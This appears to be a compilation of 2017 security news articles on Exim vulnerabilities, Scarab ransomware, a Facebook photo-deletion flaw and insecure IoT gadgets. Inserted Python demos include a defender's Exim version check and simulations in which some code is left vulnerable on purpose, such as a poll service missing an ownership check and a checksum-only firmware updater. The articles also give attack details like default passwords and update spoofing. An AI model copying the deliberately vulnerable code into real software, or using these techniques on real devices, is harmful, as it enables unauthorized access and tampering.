Gladius Shows Promise in Utilizing Blockchain Tech to Fight Hackers
27.11.2017 thehackernews  Hacking


Image Credit: Pixelbay
Blockchain startups are cropping up left and right aiming to disrupt existing services and business models.
These range from the trivial to potentially game-changing solutions that can revolutionize the internet as we know it. Among those that promise to change the world, most are attempting to reconstruct the entire internet infrastructure into something that is decentralized, secure, scalable, and tokenized.
There are also those that aim to solve the most significant problems plaguing the digital world, particularly potentially costly and tedious security issues. We do not lack for dangers, ranging from data breaches to denial-of-service attacks, and other hacks.
For the most part, there are capable SaaS and software-defined services that can address the threats involving malware and DDoS.
However, blockchains offer much more.
The plague of DDoS
Distributed denial-of-service or DDoS attacks involve a malicious hacker deploying a network of infected computers to send traffic and make queries to the target host. Because the botnet can comprise thousands of unique devices, it is difficult to block on a per-IP basis.
Oftentimes, without adequate protection, a DDoS attack can slow down a website or service to a crawl until it is no longer accessible either by running out of bandwidth allocation or simply being overwhelmed with traffic.
According to this DDoS Impact survey, almost half of respondents say they have encountered a DDoS attack, with more than 90 percent of these businesses being attacked within a span of 12 months.
The average DDoS attack lasted between 6 and 24 hours, and at a cost of $40,000 per hour, these attacks cost businesses about $500,000 per attack on average, with some costing even more for larger enterprises.
For small businesses, the cost can be more severe, especially for those that depend solely on their online operations and sales to thrive.
These are only the costs associated with IT activity. When a website goes down, all its business goes down with it – this can be particularly troublesome for a company running an e-commerce website or a consumer-facing application.
Blockchain-based solutions for DDoS
Sadly, a DDoS attack is something that cannot be prevented. You can only mitigate its effects, and your infrastructure can merely ward off the excessive traffic and bandwidth utilization through several means. For the most part, deploying DDoS protection entails deflecting any botnet traffic, so that your main server or cloud deployment is not overloaded.
As earlier mentioned, cloud-based DDoS protection acts as a barrier between the main server and the internet at large. Whenever an attack occurs, the service efficiently “absorbs” the traffic to minimize the impact on the infrastructure itself.
This can only go so far, however. Even the most robust of cloud infrastructures can only handle so much traffic. Besides, for businesses, the costs involved could be overwhelming.
Here is where a blockchain and a highly distributed approach can offer more value.
Gladius, a blockchain service for DDoS prevention and website acceleration, aims to leverage its global network of individual and independent nodes to mitigate the effects of a DDoS attack and to cache content all across the world so that websites load faster.
Being a decentralized network, users can rent out their spare bandwidth through a desktop client and earn money for sharing it. Their excess bandwidth is distributed to nodes, which in turn funnel the bandwidth to websites under DDoS attack to make sure they stay up.
During “peace time” or periods without a DDoS, Gladius’ network also speeds up access to the internet by acting as a content delivery network, wherein web content is cached for faster delivery to the target client’s browser.
The perks of a peer-to-peer network

Image Credit: Gladius
A decentralized network has additional benefits beyond the simple cloud-based deployment.
While a cloud is, to some extent, distributed, it is still owned by whoever runs the platform. In contrast, a blockchain runs completely off of a decentralized network, wherein the nodes are independently owned.
Herein lies the additional benefit.
With most blockchains, nodes are rewarded through a tokenized incentive scheme – it is the same with Gladius. Individual computer owners can earn cryptocurrency tokens whenever their resources are shared with the network.
Toward a decentralized sharing economy
Blockchain startups are representative of where we are heading in the future: a truly decentralized sharing economy. We have had a glimpse of such sharing economies with platforms like Uber, Airbnb, and the like.
However, these foster a sharing economy without the decentralized aspect – the platform is still owned by a corporate entity, for instance.
With blockchain startups, the sharing economy is built entirely upon the independent and decentralized nodes that make up the network.
Bitcoin proved that we could have an exchange of value through a decentralized system. Ethereum proved we could establish self-executing smart contracts without third parties or mediums.
With solutions like Gladius, we are likewise hopeful that the internet’s infrastructure can be disrupted for the benefit of both users and the businesses that build value.


Exim Internet Mailer Found Vulnerable to RCE And DoS Bugs; Patch Now
27.11.2017 thehackernews  Vulnerebility

A security researcher has discovered and publicly disclosed two critical vulnerabilities in the popular Internet mail message transfer agent Exim, one of which could allow a remote attacker to execute malicious code on the targeted server.
Exim is an open source mail transfer agent (MTA) developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which is responsible for routing, delivering and receiving email messages.
The first vulnerability, identified as CVE-2017-16943, is a use-after-free bug which could be exploited to remotely execute arbitrary code in the SMTP server by crafting a sequence of BDAT commands.
"To trigger this bug, BDAT command is necessary to perform an allocation by raising an error," the researcher said. "Through our research, we confirm that this vulnerability can be exploited to remote code execution if the binary is not compiled with PIE."
The researcher (mehqq_) has also published a Proof-of-Concept (PoC) exploit code written in Python that could allow anyone to gain code execution on vulnerable Exim servers.
The second vulnerability, identified as CVE-2017-16944, is a denial of service (DoS) flaw that could allow a remote attacker to hang Exim servers even after the connection is closed, by forcing them to run in an infinite loop without crashing.
The flaw exists due to improper checking for a '.' character to signify the end of an email when parsing the BDAT data header.
"The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function," the vulnerability description reads.
The researcher has also included a proof-of-concept (PoC) exploit for this vulnerability, which makes the Exim server run out of stack and crash.
Both vulnerabilities reside in Exim versions 4.88 and 4.89, and sysadmins are recommended to update their mail transfer agent to Exim version 4.90, released on GitHub.
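An added defender-side check, not from the article or the Exim project: it parses the SMTP greeting and EHLO reply collected from your own mail hosts, flags the versions the advisory names, and treats a host as exposed only when it also advertises CHUNKING, the capability a client needs before it can send BDAT at all. The hostnames and responses below are constructed samples.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional, Set, Tuple

# Versions named in the advisory: 4.88 and 4.89 affected, 4.90 fixed.
FIRST_AFFECTED = (4, 88)
FIXED = (4, 90)

# Exim greets with e.g. "220 host ESMTP Exim 4.89 Mon, 27 Nov 2017 10:00:00 +0000"
BANNER_RE = re.compile(r"\bExim\s+(\d+)\.(\d+)")


@dataclass
class EximCheck:
    host: str
    version: Optional[Tuple[int, int]]
    chunking_advertised: bool

    @property
    def affected_version(self) -> bool:
        return self.version is not None and FIRST_AFFECTED <= self.version < FIXED

    @property
    def exposed(self) -> bool:
        # Both bugs are reached through BDAT, which a client can only use once
        # the server advertises CHUNKING in its EHLO reply.
        return self.affected_version and self.chunking_advertised


def parse_banner(banner: str) -> Optional[Tuple[int, int]]:
    """Return (major, minor) from an SMTP 220 greeting, or None if it is not Exim."""
    if not banner.startswith("220"):
        return None
    m = BANNER_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def parse_ehlo(reply: str) -> Set[str]:
    """Collect the extension keywords from a multi-line 250 EHLO reply."""
    exts: Set[str] = set()
    lines = [ln for ln in reply.splitlines() if ln.startswith("250")]
    for line in lines[1:]:  # the first 250 line is the greeting, not an extension
        body = line[4:].strip()
        if body:
            exts.add(body.split()[0].upper())
    return exts


def assess(host: str, banner: str, ehlo_reply: str) -> EximCheck:
    return EximCheck(host, parse_banner(banner), "CHUNKING" in parse_ehlo(ehlo_reply))


# Constructed sample responses (not real hosts), standing in for what a scan
# of your own mail servers would collect.
SAMPLES: Dict[str, Tuple[str, str]] = {
    "mx1.example.test": (  # affected version and CHUNKING advertised
        "220 mx1.example.test ESMTP Exim 4.89 Mon, 27 Nov 2017 10:00:00 +0000",
        "250-mx1.example.test Hello scanner [192.0.2.10]\r\n250-SIZE 52428800\r\n"
        "250-8BITMIME\r\n250-PIPELINING\r\n250-CHUNKING\r\n250 HELP",
    ),
    "mx2.example.test": (  # affected version, but CHUNKING not advertised
        "220 mx2.example.test ESMTP Exim 4.88 Mon, 27 Nov 2017 10:00:00 +0000",
        "250-mx2.example.test Hello scanner [192.0.2.10]\r\n250-SIZE 52428800\r\n"
        "250-PIPELINING\r\n250 HELP",
    ),
    "mx3.example.test": (  # patched
        "220 mx3.example.test ESMTP Exim 4.90 Mon, 27 Nov 2017 10:00:00 +0000",
        "250-mx3.example.test Hello scanner [192.0.2.10]\r\n250-CHUNKING\r\n250 HELP",
    ),
    "mx4.example.test": (  # not Exim at all
        "220 mx4.example.test ESMTP Postfix",
        "250-mx4.example.test\r\n250-CHUNKING\r\n250 HELP",
    ),
}


def scan_samples() -> Dict[str, EximCheck]:
    return {h: assess(h, b, e) for h, (b, e) in SAMPLES.items()}


if __name__ == "__main__":
    for h, chk in scan_samples().items():
        state = "EXPOSED" if chk.exposed else (
            "affected, CHUNKING off" if chk.affected_version else "ok")
        print(f"{h}: version={chk.version} chunking={chk.chunking_advertised} -> {state}")
```

Exim's own interim mitigation was to stop advertising CHUNKING by leaving `chunking_advertise_hosts` empty; the EHLO check above confirms whether that took effect on a host that cannot be upgraded yet.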


World's Biggest Botnet Just Sent 12.5 Million Emails With Scarab Ransomware
27.11.2017 thehackernews  BotNet

A massive malicious email campaign that stems from the world's largest spam botnet Necurs is spreading a new strain of ransomware at the rate of over 2 million emails per hour and hitting computers across the globe.
The popular malspam botnet Necurs, which has previously been found distributing the Dridex banking trojan, Trickbot banking trojan, Locky ransomware, and Jaff ransomware, has now started spreading a new version of Scarab ransomware.
According to F-Secure, Necurs botnet is the most prominent deliverer of spam emails with five to six million infected hosts online monthly and is responsible for the biggest single malware spam campaigns.
Scarab ransomware is a relatively new ransomware family that was initially spotted by ID Ransomware creator Michael Gillespie in June this year.
Massive Email Campaign Spreads Scarab Ransomware

According to a blog post published by security firm Forcepoint, the massive email campaign spreading Scarab ransomware virus started at approximately 07:30 UTC on 23 November (Thursday) and sent about 12.5 million emails in just six hours.
The Forcepoint researchers said "the majority of the traffic is being sent to the .com top-level domain (TLD). However, this was followed by region-specific TLDs for the United Kingdom, Australia, France, and Germany."
The spam email contains a malicious VBScript downloader compressed with 7zip that pulls down the final payload, with one of these subject lines:
Scanned from Lexmark
Scanned from Epson
Scanned from HP
Scanned from Canon
As with previous Necurs botnet campaigns, the VBScript contained a number of references to the widely watched series Game of Thrones, like the strings 'Samwell' and 'JohnSnow.'
The final payload is the latest version of Scarab ransomware with no change in filenames, but it appends a new file extension with ".[suupport@protonmail.com].scarab" to the encrypted files.
Once done with the encryption, the ransomware then drops a ransom note with the filename "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" within each affected directory.
The ransom note does not specify the amount being demanded by the criminals; instead, it merely states that "the price depends on how fast you [the victim] write to us."
However, Scarab ransomware offers to decrypt three files for free to prove the decryption will work: "Before paying you can send us up to 3 files for free decryption."
Protection Against Ransomware
To safeguard against such ransomware infections, you should always be suspicious of any uninvited document sent over email and should never click on links provided in those documents unless you have verified the source.
Most importantly, keep a good backup routine in place that copies your files to an external storage device that is not always connected to your PC, so that you always have a tight grip on all your important files and documents.
Moreover, make sure that you run an active anti-virus solution on your system, and always browse the Internet safely.


Another Facebook Bug Allowed Anyone to Delete Your Photos

27.11.2017 thehackernews  Social

If you think a website whose value is more than $500 billion does not have any vulnerability in it, then you are wrong.
Pouya Darabi, an Iranian web developer, discovered and reported a critical yet straightforward vulnerability in Facebook earlier this month that could have allowed anyone to delete any photo from the social media platform.
The vulnerability resides in Facebook's new Poll feature, launched by the social media giant earlier this month, for posting polls that include images and GIF animations.
Darabi analyzed the feature and found that when creating a new poll, anyone can easily replace the image ID (or gif URL) in the request sent to the Facebook server with the image ID of any photo on the social media network.


Now, after sending the request with another user image ID (uploaded by someone else), that photo would appear in the poll.
"Whenever a user tries to create a poll, a request containing gif URL or image id will be sent, poll_question_data[options][][associated_image_id] contains the uploaded image id," Darabi said. "When this field value changes to any other images ID, that image will be shown in poll."
Apparently, if the creator of the poll deletes that post (poll), as demonstrated in the video above, it would eventually delete the source photo as well, whose image ID was added to the request—even if the poll creator doesn't own that photo.
The researcher said he received $10,000 as his bug bounty reward from Facebook after he responsibly reported this vulnerability to the social media network on November 3. Facebook patched this issue on November 5.
This isn't the first time Facebook has been found dealing with such a vulnerability. In the past, researchers discovered and reported several issues that let them delete videos, photo albums, and comments and modify messages on the social media platform.
Darabi has also previously been awarded by Facebook with a $15,000 bug bounty for bypassing its cross-site request forgery (CSRF) protection systems (in 2015) and another $7,500 for a similar issue (in 2016).
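The bug is a missing object-level authorization check: the server trusted the client-supplied image ID and later cascaded the poll deletion to that image. Added example, not Facebook's code: a minimal in-memory poll service with the behaviour the article describes next to a hardened version that checks image ownership when the poll is created and again when it is deleted. Field and user names are constructed; `associated_image_id` is the request field quoted above.

```python
from dataclasses import dataclass
from typing import Dict


class NotAuthorized(Exception):
    pass


@dataclass
class Image:
    image_id: int
    owner: str


@dataclass
class Poll:
    poll_id: int
    creator: str
    associated_image_id: int  # name taken from the request field quoted in the article


class PhotoService:
    def __init__(self) -> None:
        self.images: Dict[int, Image] = {}
        self.polls: Dict[int, Poll] = {}
        self._next_poll_id = 1

    def upload(self, owner: str, image_id: int) -> None:
        self.images[image_id] = Image(image_id, owner)

    def _new_poll(self, creator: str, image_id: int) -> int:
        poll_id = self._next_poll_id
        self._next_poll_id += 1
        self.polls[poll_id] = Poll(poll_id, creator, image_id)
        return poll_id

    # --- Behaviour the article describes ---------------------------------
    def create_poll_vulnerable(self, requester: str, associated_image_id: int) -> int:
        # Only checks that the ID exists, so any photo on the site can be attached.
        if associated_image_id not in self.images:
            raise KeyError("no such image")
        return self._new_poll(requester, associated_image_id)

    def delete_poll_vulnerable(self, requester: str, poll_id: int) -> None:
        poll = self.polls.get(poll_id)
        if poll is None or poll.creator != requester:
            raise NotAuthorized("not the poll creator")
        del self.polls[poll_id]
        # Cascades to the attached photo without asking who owns it.
        self.images.pop(poll.associated_image_id, None)

    # --- Hardened version -------------------------------------------------
    def create_poll(self, requester: str, associated_image_id: int) -> int:
        image = self.images.get(associated_image_id)
        if image is None:
            raise KeyError("no such image")
        if image.owner != requester:
            # Object-level authorization: the ID is valid, but it is not yours.
            raise NotAuthorized("image belongs to another user")
        return self._new_poll(requester, associated_image_id)

    def delete_poll(self, requester: str, poll_id: int) -> None:
        poll = self.polls.get(poll_id)
        if poll is None or poll.creator != requester:
            raise NotAuthorized("not the poll creator")
        del self.polls[poll_id]
        image = self.images.get(poll.associated_image_id)
        # Re-check ownership at deletion time instead of trusting the stored link.
        if image is not None and image.owner == requester:
            del self.images[poll.associated_image_id]


def demo_vulnerable() -> bool:
    """True if mallory manages to delete alice's photo (constructed users)."""
    svc = PhotoService()
    svc.upload("alice", 42)
    pid = svc.create_poll_vulnerable("mallory", 42)
    svc.delete_poll_vulnerable("mallory", pid)
    return 42 not in svc.images


def demo_hardened() -> bool:
    """True if alice's photo survives the same sequence against the hardened code."""
    svc = PhotoService()
    svc.upload("alice", 42)
    try:
        svc.create_poll("mallory", 42)
    except NotAuthorized:
        pass
    return 42 in svc.images and not svc.polls


def demo_owner_delete() -> bool:
    """True if the legitimate flow (owner deletes her own poll and photo) still works."""
    svc = PhotoService()
    svc.upload("alice", 7)
    pid = svc.create_poll("alice", 7)
    svc.delete_poll("alice", pid)
    return 7 not in svc.images and not svc.polls
```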


IoT lottery: finding a perfectly secure connected device
27.11.2017 Kaspersky IoT
Black Friday and Cyber Monday are great for shopping. Vendors flood the market with all kinds of goods, including lots of exciting connected devices that promise to make our life easier, happier and more comfortable. Being enthusiastic shoppers just like many other people around the world, at Kaspersky Lab we are, however, paranoid enough to look at any Internet of Things (IoT) device with some concern, even when the price is favorable. All because there is little fun in buying a coffeemaker that would give up your home or corporate Wi-Fi password to an anonymous hacker, or a baby monitor that could livestream your family moments to someone you most definitely don’t want it livestreamed to.

It is no secret that the current state of security of the IoT is far from perfect, and in buying one of those devices you are potentially buying a digital backdoor to your house. So, while preparing for IoT shopping this year, we asked ourselves: what are our chances of buying a perfectly secure connected device? To find the answer, we conducted a small experiment: we randomly took several different connected devices and reviewed their security setup. It would be an exaggeration to say that we conducted a deep investigation. This exercise was more about what you’d be able to see at first glance if you had a clue about how these things should and shouldn’t work. As a result, we found some rather worrying security issues and a few less serious, but unnecessary, ones.

We looked at the following devices: a smart battery charger, an app-controlled toy car, an app-controlled smart set of scales, a smart vacuum cleaner, a smart iron, an IP camera, a smart watch, and a smart home hub.

Smart Charger
The first device we checked was the smart charger that attracted us with its built-in Wi-Fi connectivity. You may ask yourself: who would need a remotely controlled battery charger, especially when you need to manually set the battery to charge? Nevertheless, it exists and it allows you not only to charge the battery, but to manage the way you charge it. Like a boss.

The device we tested charges and restores most types of batteries with a nominal voltage from 3 to 12 volts. It has a Wi-Fi module, which allows the device owner to connect remotely to control the charging process, to change the charging settings and to check how much electricity the battery is storing at any time.

Once turned on, the device switches by default to ‘access point’ mode. The user should then connect to the device and open the management interface web page. The connection between the charger and the device you use to access the management panel uses the outdated and vulnerable WEP algorithm instead of WPA2. It is, however, password protected. Having said that, the predefined password is ‘11111’, and it is actually written in the official documentation that comes with the device and is searchable online. You can change the password to a more secure one, but, for some reason, its length is limited to five symbols. Based on the information available here, it would take four minutes to crack such a password. In addition to that, the web interface of the device itself has no password protection at all. It is available as is, once it is connected to your home Wi-Fi network.

Who would attack a smart charger anyway, you may well ask, and you would probably be right, as there are likely few black hat hackers in the world who would want to do that, especially when it requires the attacker to be within range of the Wi-Fi signal or to have access to your Wi-Fi router (which, by the way, is a much bigger problem). On the other hand, the ability to interfere with how the battery is charging, or to randomly switch the parameters, could be considered worth a try by a wicked person. The probability of real damage, like setting fire to the battery or just ruining it, is heavily dependent on the type of battery; however, the attack can be performed just for lulz. Just because they can.

To sum up: most likely when using this device, you won’t be in constant danger of a devastating remote cyberattack. However, if your battery eventually catches fire while charging, it could be a sign that you have a hacker in your neighborhood, and you have to change the password for the device. Or it could be the work of a remote hacker, which probably means that your Wi-Fi router needs a firmware update or a password change.

Smart App-Controlled Wireless Spy Vehicle
While some people are looking for useful IoT features, others seek entertainment and fun. After all, who didn’t dream of their own spying toolset when they were young? Well, a Smart App-Controlled Wireless Spy Vehicle would have seemed a dream come true.

This smart device is actually a spy camera on wheels, connected via Wi-Fi and managed via an application. The spy vehicle, sold in toy stores, has Wi-Fi as the only connection interface. For management there are two official applications, for iOS and Android. We assumed that there could be a weakness in the Wi-Fi connections – and we turned out to be right.

The device is able to execute the following commands:

Move across the area (with multiple riding modes, it is possible to control speed and direction)
View an image from the navigation camera during movement, for ease of navigation
View an image from the main camera, which can also be rotated in different directions (there is even a night vision mode)
Record photos and videos that are stored in the phone’s memory
Play audio remotely via a built-in speaker
Once connected to a phone, it becomes a Wi-Fi access point without password requirements. In other words, any person connected to it can send remote commands to the vehicle – you’d just need to know which commands to send. And if you – being a bit concerned about the lack of password protection in a child’s toy that has spying capabilities – decided to set one up, you’d find there was no opportunity to do so. And if you have basic network sniffing software on your laptop, and decided you’d like to see what the vehicle was currently filming, you’d be able to intercept the traffic between the vehicle and the controlling device.

That said, a remote attack is not possible with this device, and a malicious third party would have to be within range of the toy’s Wi-Fi signal, which has to be enabled. But on the other hand, nothing prevents an attacker from listening to your traffic in passive mode and catching the moment when the device is used. So if you have seen someone with a Wi-Fi antenna near your house recently, chances are they’re curious about your private life, and have the means to look into it.

Smart Robo Vacuum Cleaner. With camera
Speaking of other devices with cameras that are around you, we spent some time trying to figure out why a smart vacuum cleaner would need to have a web-cam – is it for the macro filming of dust? Or to explore the exciting under-bed world? Joking aside, this function was made specifically for the cleaning enthusiast: if you find it exciting to control the vacuum cleaner manually while checking exactly what it’s doing, this is the gadget for you. Just keep in mind that it is not quite secure.

The device is managed via a specific application – you can control the cleaner’s movement, get video live-streaming while it’s cleaning, take pictures, etc. The video will disappear after streaming, while photos are stored in the application.

There are two ways to connect to the device via Wi-Fi:

With the cleaner as access point. If you don’t have a Wi-Fi network in your home, the device will provide the connection itself. You simply connect to the cleaner via the mobile application – and off you go!
The cleaner can also work as a Wi-Fi adapter, connected to an existing access point. After connecting to the cleaner-as-access-point you can then connect the device to your home Wi-Fi network for better connection and operation radius.
As the device is managed via a mobile phone application, the user should first go through some kind of authorization. Interestingly enough, for this they only need to enter a weak default password – and that’s it. Thus, an attacker just needs to connect to the cleaner’s access point and type in the default password to authorize themselves in the application for pairing the mobile phone and the cleaner. After the pairing is completed, they can control the device. Also, after connection to a local network, the robot vacuum cleaner will be visible in the local network and available via the telnet protocol to anyone who is also connected to this network. Yes, the connection is password protected, and the password can be changed by the owner of the device (but really, who does that?!), and no, there is no brute force protection in place.

Also the traffic between the app and the device is encrypted, but the key is hard-coded into the app. We are still examining the device, and the following statement should be taken with a big grain of salt, but potentially a third-party could download the app from Google Play, find the key and use it in a Man-in-the-Middle attack against the protocol.

And, of course, like any other Android-app controlled connected device, the robot vacuum cleaner is subject to attack via rooting malware: upon gaining super user rights, it can access the information coming from the cleaner’s camera and its controls. During the research, we also noticed that the device itself runs on a very old version of Linux, which potentially makes it subject to a range of other attacks through unpatched vulnerabilities. This, however, is the subject of ongoing research.

Smart Camera
IP cameras are the devices targeted most often by IoT-hackers. History shows that, besides the obvious unauthorized surveillance, this kind of device can be used for devastating DDoS-attacks. Not surprisingly, today almost any vendor producing such cameras is in the cross-hairs of hackers.

In 2015, our attempt to evaluate the state of security of consumer IoT took a look at a baby monitor; this year we’ve focused on a rather different kind of camera: the ones used for outside surveillance – for example, the ones you’ve put up in your yard to make sure neighbors don’t steal apples from your trees.

Originally, the device and its relatives from the same vendor were insecure due to a lack of vendor attention to the problem. But the issue of camera protection changed dramatically around 2016 after reports of unauthorized access to cameras became publicly known through a number of publications like here or here.

Previously, all the cameras sold by this vendor were supplied with a factory default account and default password ‘12345’. Of course, users tended not to change the password. In 2016, the picture changed radically when the vendor became an industry pioneer in security issues, and started to supply cameras in ‘not activated’ mode. Thus, there was no access to the camera before activation. Activation required the creation of a password and some network settings. Moreover, the password was validated in terms of basic complexity requirements (length, variety of characters, numbers and special characters). Activation of the camera could be performed from any PC with access to the camera over the local network.

Since this reform, updating the firmware on a camera with a default password leads to the camera demanding a password change and warning the user about security issues every time they connect. The password requirements are quite solid:

Additionally, protection from password brute forcing has been implemented:

Moreover, the vendor added a new security feature to the firmware in 2016. This involves protection against brute forcing, by automatically blocking access for an IP address after five to seven attempts to enter the wrong password. The lock is automatically removed after 30 minutes. The feature, which is enabled by default, significantly increases the level of security.

Nevertheless, not everything is perfect in the camera. For instance, the exchange of data with the cloud is performed via HTTP, with the camera’s serial number as its ID. This obviously makes Man-in-the-Middle attacks more realistic.

In addition to a standard web interface for such devices, there is a specialized tool for camera configuration, which can search for cameras on the network, display data on the cameras, and perform basic settings including activation, password changes, and password resets for network settings. When triggering the device search, the PC sends a single Ethernet frame.

The camera’s response is not encrypted and contains model information such as the firmware, reset date and network settings. Since this data is transmitted unencrypted and the request requires no authorization, this single Ethernet packet can detect all cameras on the network and obtain detailed information about them. The algorithm has one more weakness: when forming a response, time delays are not considered. As a consequence, it is easy to organize a DDoS attack in the network by sending such requests to all cameras within the presented Ethernet network.

Apart from the described specific protocol, cameras support a standard SSDP protocol for sending notifications, and this allows any software or hardware to automatically detect the cameras. This SSDP data also contains information about the model and serial number of the camera.

One more attack vector lies in the remote password reset, which is supported by a technical support service. Anyone with access to the camera’s network can select a camera through the specialized tool for camera configuration and request the reset procedure. As a result, a small file containing the serial number of the camera is created. The file is sent to the technical support service, which then either refuses the request or sends a special code to enter a new password. Interestingly enough, the service doesn’t even try to check whether the user is the owner of the camera – outdoor surveillance assumes that the camera is located out of reach, and it is almost impossible to identify remotely the author of the request. In this scenario, an insider cybercriminal attack is the most probable vector.

To sum up: luckily this is not the worst camera we’ve ever seen when it comes to cybersecurity; however, some unnecessary issues are still there to be exploited by a malicious user.

Smart Bathroom Scales
Remember that picture from the internet, where hacked smart scales threaten to post their owner’s weight online if they don’t pay a ransom? Well, joking aside we’ve proved this may be possible!

This is a smart device, interacting with a smartphone app via Bluetooth, but it is also equipped with a Wi-Fi module. This connectivity provides the owner with a number of additional features, from weight monitoring on a private website secured by a password to body analysis and integration with various healthcare apps. Interestingly enough, the only Wi-Fi-enabled feature is the receiving of weather updates.

We decided to test the possibility of arbitrary update/software installation on the specified device in the LAN using ARP spoofing and Man-in-the-Middle attacks. Here’s what we found.

The mobile phone interacts with the main server via HTTPS, in a series of queries. The scales themselves are connected to the mobile phone via Bluetooth. The process of pairing is simple: you request connection via the application, and then turn the scales’ Bluetooth connection on. Given the very limited time for this stage, it is very unlikely that someone will be able to pair the devices without the user’s knowledge.

Among other things, the device transmits various user data via Bluetooth – mail, weight readings, etc. The device receives updates via the application. The latter sends the current update version and a number of other parameters to the server; the server, in turn, passes to the application a link to the file to download and its checksum.

However, the updates are provided as is, over an HTTP channel, without encryption, and the updates themselves are also not encrypted. Thus, if you are able to listen to the network to which the device is connected, you would be able to spoof the server response or the update itself.

This enabled us to, firstly, ‘roll back’ the version of the updates, and then install a modified version that does not match the one retrieved from the server. In this scenario, the further development of attacks is possible, like installing arbitrary software on the device.
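The two weaknesses in that update flow are that the checksum travels over the same unauthenticated channel as the file (so an attacker who rewrites one rewrites both) and that nothing stops an older version from being reinstalled. Added example, not the vendor's code: a simulation of the checksum-only client beside a hardened one that authenticates the manifest and refuses downgrades. The HMAC key here is a constructed stand-in for a signing key the attacker does not hold; a real device would verify an asymmetric signature against a public key pinned in firmware. Firmware blobs and the URL are constructed.

```python
import hashlib
import hmac
from typing import Dict, Tuple

# Constructed demo key (not the vendor's). A production design would verify an
# asymmetric signature with a pinned public key so no secret lives on the device.
VENDOR_KEY = b"constructed-demo-key-do-not-use"

Manifest = Dict[str, str]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))


def make_manifest(version: str, firmware: bytes) -> Manifest:
    """What the server hands the app: a link plus a checksum of the file."""
    return {
        "version": version,
        "url": f"http://updates.example.test/fw-{version}.bin",  # constructed URL
        "checksum": sha256_hex(firmware),
    }


def sign_manifest(m: Manifest) -> str:
    msg = f"{m['version']}|{m['url']}|{m['checksum']}".encode()
    return hmac.new(VENDOR_KEY, msg, hashlib.sha256).hexdigest()


# --- The scheme the article describes: checksum over the same plaintext channel
def accept_update_weak(m: Manifest, firmware: bytes) -> bool:
    return sha256_hex(firmware) == m["checksum"]


# --- Hardened: authenticate the manifest, refuse downgrades, then check the file
def accept_update_strong(m: Manifest, tag: str, firmware: bytes,
                         installed: str) -> Tuple[bool, str]:
    if not hmac.compare_digest(sign_manifest(m), tag):
        return False, "manifest not authentic"
    if parse_version(m["version"]) <= parse_version(installed):
        return False, "rollback refused"
    if sha256_hex(firmware) != m["checksum"]:
        return False, "checksum mismatch"
    return True, "ok"


def mitm_rewrite(m: Manifest, evil_firmware: bytes, version: str) -> Manifest:
    """A LAN attacker who can rewrite HTTP responses also rewrites the checksum
    that describes the file, so a checksum-only client sees nothing wrong."""
    forged = dict(m)
    forged["version"] = version
    forged["checksum"] = sha256_hex(evil_firmware)
    return forged


# Constructed firmware blobs and device state.
GENUINE_V13 = b"firmware 1.3 (constructed)"
GENUINE_V11 = b"firmware 1.1 (constructed)"
EVIL = b"modified firmware (constructed)"
INSTALLED = "1.2"


def run_scenarios() -> Dict[str, object]:
    genuine = make_manifest("1.3", GENUINE_V13)
    tag = sign_manifest(genuine)
    forged = mitm_rewrite(genuine, EVIL, "1.1")  # rollback plus modified image

    old = make_manifest("1.1", GENUINE_V11)      # a real, signed, older release
    old_tag = sign_manifest(old)

    return {
        "weak_accepts_forgery": accept_update_weak(forged, EVIL),
        "strong_rejects_forgery": accept_update_strong(forged, tag, EVIL, INSTALLED),
        "strong_rejects_replayed_old": accept_update_strong(old, old_tag, GENUINE_V11, INSTALLED),
        "strong_accepts_genuine": accept_update_strong(genuine, tag, GENUINE_V13, INSTALLED),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name}: {result}")
```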

The good news is that this device has no camera, so even if any other severe vulnerabilities are found, you are safe. Besides that, who would want to spend time on hacking smart scales? Well, the concern is a valid one. First of all, see the picture at the beginning of this text, and secondly: as we already mentioned above, sometimes hackers do things just because they can, because certain things are just fun to crack.

Smart Iron
Fun to crack – that is something you can definitely say about a smart iron. The very existence of such a device made us very curious. The list of things you could potentially do should a severe vulnerability be found and exploited looked promising. However, the reality turned out to be rather less amusing. Spoiler: based on our research it is impossible to set fire to the house by hacking the iron. However, there are some other rather interesting issues with this device.

The iron has a Bluetooth connection that enables a number of remote management options through a mobile app. We assumed that communication with the server would be insecure, allowing someone to take control of the device and its sensitive data, as manufacturers would not be paying enough attention to the protection of this channel, believing that a smart iron would be of little value to an attacker.

Once it is connected to the user’s mobile phone, the iron is managed via the application, which exists in versions for both iOS and Android. The app allows you to:

View the orientation of the iron (whether it is lying flat, standing, or hanging by its cable)
Disable (but – sadly – not enable) the iron
Activate ‘safe mode’ (in which the iron does not react to the mechanical switch. To turn the iron on when it is in that mode you need to turn off safe mode in the app).
In terms of on/off safety the iron automatically switches off if it is stationary for five seconds in a ‘lying’ position, or for eight minutes in a ‘standing’ position.

The iron can also be controlled via the internet. For this, it is necessary to have a gateway near the device, like a separate smartphone or tablet with internet access and a special app.

Given all that, we decided to take a closer look at the applications for the device. There are three of them – one for iOS and two for Android. The first Android app is for when you manage the device via Bluetooth and are standing nearby, and the other one is for the gateway, which serves as an online door to your iron when you are not at home. The iOS app is for Bluetooth management. Speaking about the security of all applications, it is worth mentioning that the vendor’s code is not obfuscated at all.

When viewing online traffic, we found out that the Android Bluetooth application uses HTTPS, which is a sensible solution. The corresponding app for iOS does not and neither does the gateway app for Android. We decided to test the traffic for the iOS application.
 

Example of phishing attack via the application

When launched, the application offers the user the chance to register and then sends the registration data unencrypted over HTTP. This gives a very simple attack vector: intercepting the traffic between the mobile application and the vendor’s server on the local network.

As already mentioned, the phone also communicates with the iron using BLE, and that BLE traffic is not encrypted either. After a deeper investigation of the applications, we were able to control the iron by crafting the relevant commands ourselves, just from looking at what is transmitted between the devices.

So, if you were a hacker, what could you do with all this knowledge? First, if you captured the user’s credentials, you could pass the authorization stage in the official application and switch off the iron or set it to ‘safe mode’. It is important to note that these applications are used for all of the vendor’s smart devices, and there are quite a few of them, which significantly enlarges the attack surface.

